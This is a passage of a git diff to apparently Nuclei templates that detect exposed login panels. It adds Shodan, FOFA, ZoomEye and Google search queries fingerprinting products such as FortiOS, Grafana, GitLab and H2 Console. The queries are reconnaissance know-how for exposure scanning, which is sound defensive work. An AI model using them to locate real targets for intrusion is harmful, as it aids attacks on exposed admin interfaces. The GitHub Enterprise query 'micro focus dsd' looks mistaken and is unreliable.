cpe:2.3:a:fortinet:fortiddos:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: fortiddos - shodan-query: http.title:"FortiDDoS" - vendor: fortinet verified: true + max-request: 1 + vendor: fortinet + product: fortiddos + shodan-query: + - http.title:"FortiDDoS" + - http.title:"fortiddos" + fofa-query: title="fortiddos" + google-query: intitle:"fortiddos" tags: panel,fortinet,fortiddos,login http: diff --git a/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml b/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml index 993d9c3700..64e3eb50c3 100644 --- a/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml @@ -14,8 +14,8 @@ info: cpe: cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: fortimanager vendor: fortinet + product: fortimanager tags: panel,fortinet,fortios,fortimanager,detect http: diff --git a/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml b/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml index 22151fe786..d7793f104c 100644 --- a/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: fortinac - shodan-query: http.title:"Fortinac" - vendor: fortinet verified: true + max-request: 1 + vendor: fortinet + product: fortinac + shodan-query: + - http.title:"Fortinac" + - http.title:"fortinac" + fofa-query: title="fortinac" + google-query: intitle:"fortinac" tags: panel,fortinet,fortinac,login http: diff --git a/http/exposed-panels/fortinet/fortinet-panel.yaml b/http/exposed-panels/fortinet/fortinet-panel.yaml index 1c72c8a177..da10e4cb83 100644 --- a/http/exposed-panels/fortinet/fortinet-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"FORTINET LOGIN" - verified: true tags: panel,fortinet,login,detect http: diff --git a/http/exposed-panels/fortinet/fortios-management-panel.yaml b/http/exposed-panels/fortinet/fortios-management-panel.yaml index 85cd4342a5..691812e475 100644 --- a/http/exposed-panels/fortinet/fortios-management-panel.yaml +++ b/http/exposed-panels/fortinet/fortios-management-panel.yaml @@ -10,11 +10,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: fortios - shodan-query: http.favicon.hash:945408572 - vendor: fortinet verified: true + max-request: 1 + vendor: fortinet + product: fortios + shodan-query: + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - port:10443 http.favicon.hash:945408572 + - http.html:"/remote/login" "xxxxxxxx" + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: panel,fortinet,fortios,fortigate,fortiproxy,fortiap http: diff --git a/http/exposed-panels/fortinet/fortios-panel.yaml b/http/exposed-panels/fortinet/fortios-panel.yaml index 10838001cc..d88ff7b12a 100644 --- a/http/exposed-panels/fortinet/fortios-panel.yaml +++ b/http/exposed-panels/fortinet/fortios-panel.yaml @@ -13,11 +13,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: fortios - shodan-query: http.favicon.hash:945408572 - vendor: fortinet verified: true + max-request: 1 + vendor: fortinet + product: fortios + shodan-query: + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - port:10443 http.favicon.hash:945408572 + - http.html:"/remote/login" "xxxxxxxx" + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: panel,fortinet,fortios http: diff --git a/http/exposed-panels/fortinet/fortisiem-panel.yaml b/http/exposed-panels/fortinet/fortisiem-panel.yaml index bfa0541c28..912db7397b 100644 --- a/http/exposed-panels/fortinet/fortisiem-panel.yaml +++ b/http/exposed-panels/fortinet/fortisiem-panel.yaml @@ -6,10 +6,10 @@ info: severity: info description: FortiSIEM login panel was detected. metadata: - shodan-query: http.favicon.hash:-1341442175 verified: true + max-request: 2 + shodan-query: "http.favicon.hash:-1341442175" tags: panel,fortisiem - flow: http(1) && http(2) http: - method: GET diff --git a/http/exposed-panels/fortinet/fortitester-login-panel.yaml b/http/exposed-panels/fortinet/fortitester-login-panel.yaml index 3060079e5b..4443660254 100644 --- a/http/exposed-panels/fortinet/fortitester-login-panel.yaml +++ b/http/exposed-panels/fortinet/fortitester-login-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:fortinet:fortitester:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: fortitester - shodan-query: title:"FortiTester" - vendor: fortinet verified: true + max-request: 2 + vendor: fortinet + product: fortitester + shodan-query: + - title:"FortiTester" + - http.title:"fortitester" + fofa-query: title="fortitester" + google-query: intitle:"fortitester" tags: panel,fortinet http: diff --git a/http/exposed-panels/fortinet/fortiweb-panel.yaml b/http/exposed-panels/fortinet/fortiweb-panel.yaml index 38cb069229..ab26296a98 100644 --- a/http/exposed-panels/fortinet/fortiweb-panel.yaml +++ b/http/exposed-panels/fortinet/fortiweb-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"FortiWeb - " - product: fortiweb vendor: fortinet + product: fortiweb + shodan-query: + - http.title:"FortiWeb - " + - http.title:"fortiweb - " + fofa-query: title="fortiweb - " + google-query: intitle:"fortiweb - " tags: panel,fortinet,fortiweb,login http: diff --git a/http/exposed-panels/fortinet/fortiwlm-panel.yaml b/http/exposed-panels/fortinet/fortiwlm-panel.yaml index aa4c6ccced..4cb84651e6 100644 --- a/http/exposed-panels/fortinet/fortiwlm-panel.yaml +++ b/http/exposed-panels/fortinet/fortiwlm-panel.yaml @@ -14,9 +14,16 @@ info: cpe: cpe:2.3:a:fortinet:fortiwlm:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: fortiwlm - shodan-query: html:"fortiwlm" vendor: fortinet + product: fortiwlm + shodan-query: + - html:"fortiwlm" + - http.html:"fortiwlm" + - http.title:"fortiwlm" + fofa-query: + - title="fortiwlm" + - body="fortiwlm" + google-query: intitle:"fortiwlm" tags: panel,fortinet,fortiwlm,login http: diff --git a/http/exposed-panels/freeipa-panel.yaml b/http/exposed-panels/freeipa-panel.yaml index bd950ef518..530e171ad6 100644 --- a/http/exposed-panels/freeipa-panel.yaml +++ b/http/exposed-panels/freeipa-panel.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:freeipa:freeipa:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: freeipa - shodan-query: html:"FreeIPA" - vendor: freeipa verified: true + max-request: 2 + vendor: freeipa + product: freeipa + shodan-query: + - html:"FreeIPA" + - http.html:"freeipa" + fofa-query: body="freeipa" tags: panel,login,freeipa http: diff --git a/http/exposed-panels/freepbx-administration-panel.yaml b/http/exposed-panels/freepbx-administration-panel.yaml index 76807a0d96..1edb14b0cf 100644 --- a/http/exposed-panels/freepbx-administration-panel.yaml +++ b/http/exposed-panels/freepbx-administration-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: freepbx - shodan-query: http.title:"FreePBX Administration" - vendor: sangoma verified: true + max-request: 1 + vendor: sangoma + product: freepbx + shodan-query: + - http.title:"FreePBX Administration" + - http.title:"freepbx administration" + fofa-query: title="freepbx administration" + google-query: intitle:"freepbx administration" tags: freepbx,panel,sangoma http: diff --git a/http/exposed-panels/friendica-panel.yaml b/http/exposed-panels/friendica-panel.yaml index cbdcfa3f96..d62c3d74c1 100644 --- a/http/exposed-panels/friendica-panel.yaml +++ b/http/exposed-panels/friendica-panel.yaml @@ -11,11 +11,15 @@ info: classification: cpe: cpe:2.3:a:friendica:friendica:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: friendica - shodan-query: http.title:"Friendica" - vendor: friendica verified: true + max-request: 1 + vendor: friendica + product: friendica + shodan-query: + - http.title:"Friendica" + - http.title:"friendica" + fofa-query: title="friendica" + google-query: intitle:"friendica" tags: friendica,panel,login,detect http: diff --git a/http/exposed-panels/froxlor-management-panel.yaml b/http/exposed-panels/froxlor-management-panel.yaml index 088c44c214..b57b705451 100644 --- a/http/exposed-panels/froxlor-management-panel.yaml +++ b/http/exposed-panels/froxlor-management-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:froxlor:froxlor:*:*:*:*:gentoo:*:*:* metadata: - max-request: 1 - product: froxlor - shodan-query: title:"Froxlor Server Management Panel" - vendor: froxlor verified: true + max-request: 1 + vendor: froxlor + product: froxlor + shodan-query: + - title:"Froxlor Server Management Panel" + - http.title:"froxlor server management panel" + fofa-query: title="froxlor server management panel" + google-query: intitle:"froxlor server management panel" tags: panel,froxlor http: diff --git a/http/exposed-panels/ftm-manager-panel.yaml b/http/exposed-panels/ftm-manager-panel.yaml index 490375daf9..fa7f204d41 100644 --- a/http/exposed-panels/ftm-manager-panel.yaml +++ b/http/exposed-panels/ftm-manager-panel.yaml @@ -10,12 +10,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ibm:financial_transaction_manager:*:*:*:*:digital_payments:*:*:* metadata: - google-query: intitle:"FTM manager" - max-request: 1 - product: financial_transaction_manager - shodan-query: http.html:"FTM manager" - vendor: ibm verified: true + max-request: 1 + vendor: ibm + product: financial_transaction_manager + shodan-query: + - http.html:"FTM manager" + - http.html:"ftm manager" + - http.title:"ftm manager" + google-query: + - intitle:"FTM manager" + - intitle:"ftm manager" + fofa-query: + - title="ftm manager" + - body="ftm manager" tags: panel,ftm,ibm http: diff --git a/http/exposed-panels/fuelcms-panel.yaml b/http/exposed-panels/fuelcms-panel.yaml index 0120b99663..89ff898341 100644 --- a/http/exposed-panels/fuelcms-panel.yaml +++ b/http/exposed-panels/fuelcms-panel.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:daylightstudio:fuel_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: fuel_cms vendor: daylightstudio + product: fuel_cms + shodan-query: http.title:"fuel cms" + fofa-query: title="fuel cms" + google-query: intitle:"fuel cms" tags: panel,fuelcms,oss,daylightstudio http: diff --git a/http/exposed-panels/fuji-xerox-printer-detect.yaml b/http/exposed-panels/fuji-xerox-printer-detect.yaml index 38f34fb4e2..1eed56192c 100644 --- a/http/exposed-panels/fuji-xerox-printer-detect.yaml +++ b/http/exposed-panels/fuji-xerox-printer-detect.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Fuji Xerox Co., Ltd" - verified: true tags: iot,panel,fuji,printer http: diff --git a/http/exposed-panels/fusionauth-admin-panel.yaml b/http/exposed-panels/fusionauth-admin-panel.yaml index e7b985e459..aaabf0294d 100644 --- a/http/exposed-panels/fusionauth-admin-panel.yaml +++ b/http/exposed-panels/fusionauth-admin-panel.yaml @@ -7,11 +7,15 @@ info: classification: cpe: cpe:2.3:a:fusionauth:fusionauth:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: fusionauth - shodan-query: title:"FusionAuth" - vendor: fusionauth verified: true + max-request: 2 + vendor: fusionauth + product: fusionauth + shodan-query: + - title:"FusionAuth" + - http.title:"fusionauth" + fofa-query: title="fusionauth" + google-query: intitle:"fusionauth" tags: panel,fusionauth,detect,login http: diff --git a/http/exposed-panels/gargoyle-router.yaml b/http/exposed-panels/gargoyle-router.yaml index a584c4547f..fe8eee3a5f 100644 --- a/http/exposed-panels/gargoyle-router.yaml +++ b/http/exposed-panels/gargoyle-router.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Gargoyle Router Management Utility" - verified: true tags: panel,iot,gargoyle,router,edb http: diff --git a/http/exposed-panels/geoserver-login-panel.yaml b/http/exposed-panels/geoserver-login-panel.yaml index 293f137891..cc4388844a 100644 --- a/http/exposed-panels/geoserver-login-panel.yaml +++ b/http/exposed-panels/geoserver-login-panel.yaml @@ -10,11 +10,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: geoserver - shodan-query: title:"GeoServer" - vendor: osgeo verified: true + max-request: 2 + vendor: osgeo + product: geoserver + shodan-query: + - title:"GeoServer" + - http.title:"geoserver" + fofa-query: + - app="geoserver" + - title="geoserver" + google-query: intitle:"geoserver" tags: panel,geoserver,osgeo http: diff --git a/http/exposed-panels/gerapy-detect.yaml b/http/exposed-panels/gerapy-detect.yaml index 392426a0d0..c1c2a585cf 100644 --- a/http/exposed-panels/gerapy-detect.yaml +++ b/http/exposed-panels/gerapy-detect.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:gerapy:gerapy:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: gerapy vendor: gerapy + product: gerapy tags: tech,gerapy,panel http: diff --git a/http/exposed-panels/gira-homeserver-homepage.yaml b/http/exposed-panels/gira-homeserver-homepage.yaml index 27e61c5edf..5620a56b23 100644 --- a/http/exposed-panels/gira-homeserver-homepage.yaml +++ b/http/exposed-panels/gira-homeserver-homepage.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Gira HomeServer 4" - verified: true tags: panel,gira http: diff --git a/http/exposed-panels/git-repository-browser.yaml b/http/exposed-panels/git-repository-browser.yaml index 38bb9e13f5..11efb99d31 100644 --- a/http/exposed-panels/git-repository-browser.yaml +++ b/http/exposed-panels/git-repository-browser.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: cgit - shodan-query: http.title:"Git repository browser" - vendor: cgit_project verified: true + max-request: 1 + vendor: cgit_project + product: cgit + shodan-query: + - http.title:"Git repository browser" + - http.title:"git repository browser" + fofa-query: title="git repository browser" + google-query: intitle:"git repository browser" tags: panel,git,cgit_project http: diff --git a/http/exposed-panels/gitblit-panel.yaml b/http/exposed-panels/gitblit-panel.yaml index 151c2f0b24..77b1573a7a 100644 --- a/http/exposed-panels/gitblit-panel.yaml +++ b/http/exposed-panels/gitblit-panel.yaml @@ -10,11 +10,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:gitblit:gitblit:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: gitblit - shodan-query: http.title:"Gitblit" - vendor: gitblit verified: true + max-request: 1 + vendor: gitblit + product: gitblit + shodan-query: + - http.title:"Gitblit" + - http.title:"gitblit" + - http.html:"gitblit" + fofa-query: + - body="gitblit" + - title="gitblit" + google-query: intitle:"gitblit" tags: panel,gitblit http: diff --git a/http/exposed-panels/gitea-login.yaml b/http/exposed-panels/gitea-login.yaml index 9428b966d2..8c3844ba11 100644 --- a/http/exposed-panels/gitea-login.yaml +++ b/http/exposed-panels/gitea-login.yaml @@ -11,9 +11,17 @@ info: cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:jenkins:*:*:* metadata: max-request: 1 - product: gitea - shodan-query: html:"Powered by Gitea Version" vendor: gitea + product: gitea + shodan-query: + - html:"Powered by Gitea Version" + - http.html:"powered by gitea version" + - http.title:"gitea" + - cpe:"cpe:2.3:a:gitea:gitea" + fofa-query: + - title="gitea" + - body="powered by gitea version" + google-query: intitle:"gitea" tags: gitea,panel http: diff --git a/http/exposed-panels/github-enterprise-detect.yaml b/http/exposed-panels/github-enterprise-detect.yaml index c3f399b194..1bf5942d9f 100644 --- a/http/exposed-panels/github-enterprise-detect.yaml +++ b/http/exposed-panels/github-enterprise-detect.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: enterprise_server - shodan-query: title:"Setup GitHub Enterprise" - vendor: github verified: true + max-request: 1 + vendor: github + product: enterprise_server + shodan-query: + - title:"Setup GitHub Enterprise" + - micro focus dsd tags: panel,github http: diff --git a/http/exposed-panels/gitlab-detect.yaml b/http/exposed-panels/gitlab-detect.yaml index 74959bbd29..b37ad1cd45 100644 --- a/http/exposed-panels/gitlab-detect.yaml +++ b/http/exposed-panels/gitlab-detect.yaml @@ -11,9 +11,14 @@ info: cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 - product: gitlab - shodan-query: http.title:"GitLab" vendor: gitlab + product: gitlab + shodan-query: + - http.title:"GitLab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: panel,gitlab http: diff --git a/http/exposed-panels/globalprotect-panel.yaml b/http/exposed-panels/globalprotect-panel.yaml index 80607b6305..f6834fd1bb 100644 --- a/http/exposed-panels/globalprotect-panel.yaml +++ b/http/exposed-panels/globalprotect-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:paloaltonetworks:globalprotect:*:*:*:*:chrome:*:*:* metadata: max-request: 2 - product: globalprotect vendor: paloaltonetworks + product: globalprotect tags: panel,panos,globalprotect,paloaltonetworks http: diff --git a/http/exposed-panels/glowroot-panel.yaml b/http/exposed-panels/glowroot-panel.yaml index 84e7cdac14..9219e8f043 100644 --- a/http/exposed-panels/glowroot-panel.yaml +++ b/http/exposed-panels/glowroot-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo?fbid=618105097026680&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: title:"Glowroot" - verified: true tags: panel,login,glowroot http: diff --git a/http/exposed-panels/glpi-panel.yaml b/http/exposed-panels/glpi-panel.yaml index 83b51c3801..710e1b2460 100644 --- a/http/exposed-panels/glpi-panel.yaml +++ b/http/exposed-panels/glpi-panel.yaml @@ -13,11 +13,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: - max-request: 3 - product: glpi - shodan-query: http.title:"GLPI" - vendor: glpi-project verified: true + max-request: 3 + vendor: glpi-project + product: glpi + shodan-query: + - http.title:"GLPI" + - http.title:"glpi" + - http.favicon.hash:"-1474875778" + fofa-query: + - title="glpi" + - icon_hash="-1474875778" + google-query: intitle:"glpi" tags: glpi,edb,panel,glpi-project http: diff --git a/http/exposed-panels/gnu-mailman.yaml b/http/exposed-panels/gnu-mailman.yaml index fed3a59f4f..eef2fc41da 100644 --- a/http/exposed-panels/gnu-mailman.yaml +++ b/http/exposed-panels/gnu-mailman.yaml @@ -11,11 +11,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:gnu:mailman:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: mailman - shodan-query: title:"Mailing Lists" - vendor: gnu verified: true + max-request: 2 + vendor: gnu + product: mailman + shodan-query: + - title:"Mailing Lists" + - http.title:"mailing lists" + - cpe:"cpe:2.3:a:gnu:mailman" + fofa-query: title="mailing lists" + google-query: intitle:"mailing lists" tags: exposure,mailman,panel,gnu http: diff --git a/http/exposed-panels/goanywhere-mft-login.yaml b/http/exposed-panels/goanywhere-mft-login.yaml index 1cf6e33ca8..b4da5ffba1 100644 --- a/http/exposed-panels/goanywhere-mft-login.yaml +++ b/http/exposed-panels/goanywhere-mft-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.html:"GoAnywhere Managed File Transfer" - verified: true tags: panel,goanywhere,login,filetransfer http: diff --git a/http/exposed-panels/gocd-login.yaml b/http/exposed-panels/gocd-login.yaml index 198b90babc..d2bb93c61e 100644 --- a/http/exposed-panels/gocd-login.yaml +++ b/http/exposed-panels/gocd-login.yaml @@ -11,9 +11,16 @@ info: cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: gocd - shodan-query: html:"GoCD Version" vendor: thoughtworks + product: gocd + shodan-query: + - html:"GoCD Version" + - http.html:"gocd version" + - http.title:"create a pipeline - go" html:"gocd version" + fofa-query: + - title="create a pipeline - go" html:"gocd version" + - body="gocd version" + google-query: intitle:"create a pipeline - go" html:"gocd version" tags: go,panel,gocd,thoughtworks http: diff --git a/http/exposed-panels/gocron-panel.yaml b/http/exposed-panels/gocron-panel.yaml index 5efaadd34e..5b9faeb0dd 100644 --- a/http/exposed-panels/gocron-panel.yaml +++ b/http/exposed-panels/gocron-panel.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="gocron-定时任务系统" max-request: 1 + fofa-query: app="gocron-定时任务系统" tags: gocron,panel http: diff --git a/http/exposed-panels/gogs-panel.yaml b/http/exposed-panels/gogs-panel.yaml index 403505d3a4..dc890bedd6 100644 --- a/http/exposed-panels/gogs-panel.yaml +++ b/http/exposed-panels/gogs-panel.yaml @@ -12,12 +12,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"Sign In - Gogs" - max-request: 1 - product: gogs - shodan-query: title:"Sign In - Gogs" - vendor: gogs verified: true + max-request: 1 + vendor: gogs + product: gogs + shodan-query: + - title:"Sign In - Gogs" + - http.title:"sign in - gogs" + - cpe:"cpe:2.3:a:gogs:gogs" + google-query: + - intitle:"Sign In - Gogs" + - intitle:"sign in - gogs" + fofa-query: title="sign in - gogs" tags: panel,gogs http: diff --git a/http/exposed-panels/goodjob-dashboard.yaml b/http/exposed-panels/goodjob-dashboard.yaml index 25de5981a9..5b09ba466b 100644 --- a/http/exposed-panels/goodjob-dashboard.yaml +++ b/http/exposed-panels/goodjob-dashboard.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/bensheldon/good_job metadata: - max-request: 2 verified: true + max-request: 2 tags: unauth,panel,goodjob http: diff --git a/http/exposed-panels/gotify-panel.yaml b/http/exposed-panels/gotify-panel.yaml index a8c44e2aca..04392d6dde 100644 --- a/http/exposed-panels/gotify-panel.yaml +++ b/http/exposed-panels/gotify-panel.yaml @@ -10,11 +10,15 @@ info: classification: cpe: cpe:2.3:a:gotify:server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: server - shodan-query: http.title:"Gotify" - vendor: gotify verified: true + max-request: 1 + vendor: gotify + product: server + shodan-query: + - http.title:"Gotify" + - http.title:"gotify" + fofa-query: title="gotify" + google-query: intitle:"gotify" tags: panel,gotify,login,detect http: diff --git a/http/exposed-panels/gradle/gradle-enterprise-panel.yaml b/http/exposed-panels/gradle/gradle-enterprise-panel.yaml index daf8b22393..39bd511370 100644 --- a/http/exposed-panels/gradle/gradle-enterprise-panel.yaml +++ b/http/exposed-panels/gradle/gradle-enterprise-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:gradle:gradle_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: gradle_enterprise vendor: gradle + product: gradle_enterprise tags: panel,gradle http: diff --git a/http/exposed-panels/grafana-detect.yaml b/http/exposed-panels/grafana-detect.yaml index 8b6ce6302a..e0ebf285e4 100644 --- a/http/exposed-panels/grafana-detect.yaml +++ b/http/exposed-panels/grafana-detect.yaml @@ -10,11 +10,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: - category: devops max-request: 2 - product: grafana - shodan-query: title:"Grafana" vendor: grafana + product: grafana + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + category: devops + fofa-query: + - title="grafana" + - app="grafana" + google-query: intitle:"grafana" tags: panel,grafana,detect http: diff --git a/http/exposed-panels/grails-database-admin-console.yaml b/http/exposed-panels/grails-database-admin-console.yaml index 49a5fd9567..a779d5ba45 100644 --- a/http/exposed-panels/grails-database-admin-console.yaml +++ b/http/exposed-panels/grails-database-admin-console.yaml @@ -15,8 +15,8 @@ info: cpe: cpe:2.3:a:grails:grails:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: grails vendor: grails + product: grails tags: grails,panel http: diff --git a/http/exposed-panels/graylog-panel.yaml b/http/exposed-panels/graylog-panel.yaml index c379cf6c1c..953269d225 100644 --- a/http/exposed-panels/graylog-panel.yaml +++ b/http/exposed-panels/graylog-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://graylog.org/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Graylog Web Interface" - verified: true tags: panel,graylog,login,detect http: diff --git a/http/exposed-panels/greenbone-panel.yaml b/http/exposed-panels/greenbone-panel.yaml index d3ed86ef59..3ff6442573 100644 --- a/http/exposed-panels/greenbone-panel.yaml +++ b/http/exposed-panels/greenbone-panel.yaml @@ -9,12 +9,18 @@ info: classification: cpe: cpe:2.3:a:greenbone:greenbone_security_assistant:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: greenbone_security_assistant - shodan-query: http.title:"Greenbone Security Assistant" - vendor: greenbone verified: true - zoomeye-query: title:"Greenbone Security Assistant" + max-request: 1 + vendor: greenbone + product: greenbone_security_assistant + shodan-query: + - http.title:"Greenbone Security Assistant" + - http.title:"greenbone security assistant" + zoomeye-query: + - title:"Greenbone Security Assistant" + - title:"greenbone security assistant" + fofa-query: title="greenbone security assistant" + google-query: intitle:"greenbone security assistant" tags: panel,greenbone,login http: diff --git a/http/exposed-panels/group-ib-panel.yaml b/http/exposed-panels/group-ib-panel.yaml index 88907a7d51..c20607adcb 100644 --- a/http/exposed-panels/group-ib-panel.yaml +++ b/http/exposed-panels/group-ib-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Group-IB Managed XDR" - verified: true tags: panel,groupib http: diff --git a/http/exposed-panels/gyra-master-admin.yaml b/http/exposed-panels/gyra-master-admin.yaml index 560af553bf..74bbd52c27 100644 --- a/http/exposed-panels/gyra-master-admin.yaml +++ b/http/exposed-panels/gyra-master-admin.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Login | GYRA Master Admin" - verified: true tags: panel,master,admin,gyra http: diff --git a/http/exposed-panels/h2console-panel.yaml b/http/exposed-panels/h2console-panel.yaml index d7293ec0a5..3d2f3a3965 100644 --- a/http/exposed-panels/h2console-panel.yaml +++ b/http/exposed-panels/h2console-panel.yaml @@ -14,9 +14,14 @@ info: cpe: cpe:2.3:a:h2database:h2:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: h2 - shodan-query: http.title:"H2 Console" vendor: h2database + product: h2 + shodan-query: + - http.title:"H2 Console" + - http.title:"h2 console" + - cpe:"cpe:2.3:a:h2database:h2" + fofa-query: title="h2 console" + google-query: intitle:"h2 console" tags: panel,h2,console,h2database http: diff --git a/http/exposed-panels/hadoop-exposure.yaml b/http/exposed-panels/hadoop-exposure.yaml index 11a10ec489..317ba47d7b 100644 --- a/http/exposed-panels/hadoop-exposure.yaml +++ b/http/exposed-panels/hadoop-exposure.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:apache:hadoop:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: hadoop vendor: apache + product: hadoop tags: panel,apache,hadoop http: diff --git a/http/exposed-panels/haivision-gateway-panel.yaml b/http/exposed-panels/haivision-gateway-panel.yaml index d66f51b2ab..4113712893 100644 --- a/http/exposed-panels/haivision-gateway-panel.yaml +++ b/http/exposed-panels/haivision-gateway-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.haivision.com/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Haivision Gateway" - verified: true tags: panel,haivision,login,detect http: diff --git a/http/exposed-panels/haivision-media-platform-panel.yaml b/http/exposed-panels/haivision-media-platform-panel.yaml index 84496be21e..81ce258fcb 100644 --- a/http/exposed-panels/haivision-media-platform-panel.yaml +++ b/http/exposed-panels/haivision-media-platform-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.haivision.com/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Haivision Media Platform" - verified: true tags: panel,haivision,login,detect http: diff --git a/http/exposed-panels/hangfire-dashboard.yaml b/http/exposed-panels/hangfire-dashboard.yaml index 638d0d263a..b5991988a1 100644 --- a/http/exposed-panels/hangfire-dashboard.yaml +++ b/http/exposed-panels/hangfire-dashboard.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:hangfire:hangfire:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: hangfire - shodan-query: 